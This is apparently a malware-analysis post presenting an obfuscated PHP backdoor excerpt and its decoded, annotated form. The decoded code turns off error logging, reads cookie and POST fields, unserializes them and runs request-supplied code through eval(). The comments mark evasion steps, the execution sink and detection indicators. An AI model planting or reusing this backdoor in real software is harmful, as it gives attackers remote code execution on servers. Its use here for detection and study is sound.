一段经过加密(混淆)的 PHP 后门代码
代码解密:https://malwaredecoder.com/result/fc0d676e44b62985879f8f61a598df7a
加密(混淆)后的后门代码(节选,首尾均被截断):
>16)&255).chr((${${"\x47\x4cOBA\x4c\x53"}["a\x6ee\x64q\x65\x79\x76\x62"]}>>8)&255).chr(${$fyojtix}&255);}return substr(${${"\x47L\x4fBAL\x53"}["\x73\x77z\x6a\x64m\x6dek"]},0,strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x6a\x69\x68\x6b\x75\x6dy\x72\x6e\x71\x63"]})-strlen(${${"\x47LOB\x41LS"}["\x63\x74\x78\x67vq\x67l\x76\x6fg"]}));}function decode($data,$key){${"\x47L\x4f\x42ALS"}["n\x7a\x78z\x78\x68d\x75i\x77\x66"]="\x69";${"GLO\x42\x41L\x53"}["\x78i\x71\x77\x62\x64k\x77"]="\x6be\x79\x33";${"\x47\x4cOB\x41L\x53"}["h\x78\x6e\x74\x73\x6d"]="\x64\x61\x74a";$nfcrlzoqiyym="\x69";$ofbkzgrupiv="\x6fu\x74\x5fda\x74a";${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74\x75"]="\x69";${${"\x47L\x4fB\x41\x4cS"}["r\x65d\x73\x6fb\x64g\x66w"]}="0\x38ae\x381a2-\x6545\x31-4\x63\x39\x38-88c\x65-9d2\x32562\x66\x30\x61\x630";${"G\x4c\x4fB\x41L\x53"}["nm\x74ku\x6b\x64\x65"]="\x6f\x75t\x5fda\x74\x61";$eykvvkxfgb="\x69";$hlrlfgf="\x6be\x79";${${"\x47\x4c\x4fBA\x4cS"}["\x77\x64\x6b\x71\x65\x67\x62t\x73"]}=pack("\x48*","0\x34\x35d07\x35\x33\x30\x62\x350\x3035\x3700\x354\x35\x35\x35\x37\x35\x35\x30\x300\x305\x36\x35\x380e\x30\x30\x30\x31\x309500\x31\x3000\x66\x30\x32\x350\x30b\x30\x630\x30\x30\x3751\x3555\x33\x357\x35\x32");${$ofbkzgrupiv}="";${"GL\x4fBA\x4c\x53"}["o\x67y\x63\x73\x66\x71\x70q"]="key\x33";for(${$nfcrlzoqiyym}=0;${${"G\x4c\x4fBA\x4cS"}["n\x7ax\x7ax\x68\x64u\x69\x77\x66"]} ?>
解密后的代码(节选,末尾被截断):
// Decoded PHP backdoor sample, annotated for analysis and detection.
// The listing is incomplete: it has no opening PHP tag, get_params() is cut off
// at the end, and decode() is not part of this decoded listing.
//
// Name table: every random $GLOBALS key below stores the *name* of a real
// variable. Later expressions of the form ${${"GLOBALS"}["<key>"]} resolve to
// that variable (e.g. "fkmyqex" -> $ak, "jkoztogk" -> $d). This indirection is
// the obfuscation layer that survives decoding and is a usable static signature.
${"GLOBALS"}["sprbwloi"]="out_data";
${"GLOBALS"}["wdkqegbts"]="key3";
${"GLOBALS"}["redsobdgfw"]="key2";
${"GLOBALS"}["cxvtsrcwr"]="n";
${"GLOBALS"}["udwwxeinjs"]="c";
${"GLOBALS"}["ctxgvqglvog"]="p";
${"GLOBALS"}["sjhywnh"]="s";
${"GLOBALS"}["rdhiivgrm"]="base64inv";
${"GLOBALS"}["oimfwpbvs"]="i";
${"GLOBALS"}["xefudwekqxr"]="base64chars";
${"GLOBALS"}["jkoztogk"]="d";
${"GLOBALS"}["jfdubfsy"]="a";
${"GLOBALS"}["ppmuyvi"]="r";
${"GLOBALS"}["fkmyqex"]="ak";
${"GLOBALS"}["nviqphl"]="data";
${"GLOBALS"}["qlymokfzoe"]="key";
// Evasion: error logging is switched off and the execution time limit removed,
// with "@" suppressing any warning if the host forbids these settings.
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("max_execution_time",0);
@set_time_limit(0);
// Entry point: every cookie and every POST field of the request is handed to
// enumerator(); array_walk() passes the field's value and its name (key).
array_walk($_COOKIE,"enumerator");
array_walk($_POST,"enumerator");
// enumerator($value, $key): treats one request field as a possible command.
//   $value - the cookie / POST field value
//   $key   - the cookie / POST field name; it is passed to decode() as the key
function enumerator($value,$key){
${"GLOBALS"}["wbnrdf"]="data";
${"GLOBALS"}["xvswmtvyod"]="value";
// $data = @unserialize(decode(get_params($value), $key));
// NOTE(review): unserialize() runs on request-controlled data; failures are
// hidden by "@", so ordinary fields that do not decode are silently ignored.
${${"GLOBALS"}["wbnrdf"]}=@unserialize(decode(get_params(${${"GLOBALS"}["xvswmtvyod"]}),${${"GLOBALS"}["qlymokfzoe"]}));
// extract($data) turns the decoded array's keys into local variables; the code
// below reads $ak, $a and $d, so those are expected to come from the payload.
@extract(${${"GLOBALS"}["nviqphl"]});
// The handler only acts when the decoded payload defined $ak.
if(isset(${${"GLOBALS"}["fkmyqex"]})){
${"GLOBALS"}["kdccuutjccpn"]="r";
${${"GLOBALS"}["kdccuutjccpn"]}=array();
${"GLOBALS"}["jkblali"]="a";
$dnyyrqcjhbg="r";
// $r["sv"] is a fixed string - presumably the backdoor's own version; it is a
// candidate indicator when hunting for this family.
${${"GLOBALS"}["ppmuyvi"]}["sv"]="1.0-3";
$kwshfzxow="r";
// $r["pv"] reports the host's PHP version.
${$dnyyrqcjhbg}["pv"]=PHP_VERSION;
// First byte of $a selects the action: 105 is "i" -> echo serialize($r)
// (version info goes back in the HTTP response body).
if(ord(${${"GLOBALS"}["jfdubfsy"]})==105)echo@serialize(${$kwshfzxow});
// 101 is "e" -> eval($d).
// NOTE(review): this is the code-execution sink - $d comes from the request.
elseif(ord(${${"GLOBALS"}["jkblali"]})==101)eval(${${"GLOBALS"}["jkoztogk"]});
}
}
// get_params($s): first transformation applied to a raw field value. The
// visible part only sets up the standard base64 alphabet and an empty
// $base64inv array, so this looks like a hand-written base64 decoder - the
// body is truncated, confirm against a complete sample.
function get_params($s){
// Locals holding variable names for later ${$name} lookups.
$egmozpvqw="c";
$dvhtoerid="base64chars";
${"GLOBALS"}["iaktaepzkolt"]="s";
// $base64chars = standard base64 alphabet.
${${"GLOBALS"}["xefudwekqxr"]}="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
${"GLOBALS"}["udgmotllrqqy"]="r";
$navmbtcm="p";
$hbzvyvtkwl="p";
$lksboqor="s";
${"GLOBALS"}["ncdgqrusodb"]="base64inv";
$pjitegq="s";
// $base64inv = Array();
${${"GLOBALS"}["ncdgqrusodb"]}=Array();
${"GLOBALS"}["ahrcdhkljchf"]="s";
${"GLOBALS"}["swzjdmmek"]="r";
// Loop over $i starts here; the listing ends mid-statement.
for(${${"GLOBALS"}["oimfwpbvs"]}=0;${${"GLOBALS"}["oimfwpbvs"]}